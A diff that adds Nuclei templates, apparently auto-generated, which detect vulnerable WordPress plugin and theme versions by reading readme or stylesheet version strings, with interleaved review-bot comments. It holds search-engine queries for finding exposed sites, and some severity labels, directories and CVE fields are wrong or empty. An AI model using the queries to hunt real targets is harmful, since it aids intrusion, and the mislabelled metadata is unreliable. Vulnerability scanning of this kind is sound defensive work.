+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "broken-link-finder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.0')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml b/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml
new file mode 100644
index 0000000000..b57bb061f4
--- /dev/null
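Review bot: `severity: low` does not agree with the `cvss-score: 5.4` on the same template, which falls in the Medium band of CVSS v3.1, and the mismatch is copied into the last `tags` element. The same drift is sharper in the poc/sql/CVE-2024-54262 hunk, where an arbitrary file upload scored 9.9 with `S:C/C:H/I:H/A:H` is also labelled `low`, and its api-scan twin under poc/remote_code_execution/import-export-for-woocommerce repeats the `low`. Deriving `severity` and the trailing tag from `cvss-score` in the generator would stop these from diverging; for this file that is `severity: medium` and `tags: cve,wordpress,wp-plugin,broken-link-finder,medium`.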
+++ b/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12560-449215acaf31dbe73bdd1b194455c475
+
+info:
+ name: >
+ Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication
+ author: topscoder
+ severity: low
+ description: >
+ The Button Block – Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12560
+ metadata:
+ fofa-query: "wp-content/plugins/button-block/"
+ google-query: inurl:"/wp-content/plugins/button-block/"
+ shodan-query: 'vuln:CVE-2024-12560'
+ tags: cve,wordpress,wp-plugin,button-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "button-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.5')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml b/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml
new file mode 100644
index 0000000000..a4dee6440c
--- /dev/null
+++ b/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa
+
+info:
+ name: >
+ Woffice <= 5.4.14 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: critical
+ description: >
+ The Woffice CRM theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.4.14. This makes it possible for unauthenticated attackers to gain access to administrator accounts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-43234
+ metadata:
+ fofa-query: "wp-content/themes/woffice/"
+ google-query: inurl:"/wp-content/themes/woffice/"
+ shodan-query: 'vuln:CVE-2024-43234'
+ tags: cve,wordpress,wp-theme,woffice,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/woffice/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.4.14')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml b/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml
new file mode 100644
index 0000000000..ea05746fcc
--- /dev/null
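Review bot: This template is filed under poc/sql/ although its `name` and `description` describe a privilege escalation, and the neighbouring poc/sql/CVE-2024-12121 (SSRF), poc/sql/CVE-2024-12560 (post disclosure) and poc/sql/easy-replace (stored XSS) hunks, as well as the reflected-XSS blaze-online-eparcel-for-woocommerce files under poc/remote_code_execution/, are misfiled the same way. Anyone selecting templates by directory will run the wrong class of check, so when the generator cannot classify a title it would be less misleading to default to poc/other/ than to pick an unrelated category.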
+++ b/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9
+
+info:
+ name: >
+ Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Import Export For WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2024-54262
+ metadata:
+ fofa-query: "wp-content/plugins/import-export-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-54262'
+ tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "import-export-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml b/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml
new file mode 100644
index 0000000000..d0b44471b4
--- /dev/null
+++ b/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml
@@ -0,0 +1,59 @@
+id: easy-replace-440c0e499d1853ea7db9693e4d2afca2
+
+info:
+ name: >
+ Easy Replace <= 1.3 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8536e655-72cc-4d7a-8ca0-7ba3042e03c1?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/easy-replace/"
+ google-query: inurl:"/wp-content/plugins/easy-replace/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,easy-replace,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/easy-replace/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "easy-replace"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml b/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml
new file mode 100644
index 0000000000..015a0e4cbc
--- /dev/null
+++ b/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml
@@ -0,0 +1,59 @@
+id: automatorwp-c0407e34fa2c909d246b6b41858c80c4
+
+info:
+ name: >
+ AutomatorWP <= 5.0.9 - Reflected Cross-Site Scripting via a-0-o-search_field_value
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/automatorwp/"
+ google-query: inurl:"/wp-content/plugins/automatorwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,automatorwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/automatorwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "automatorwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file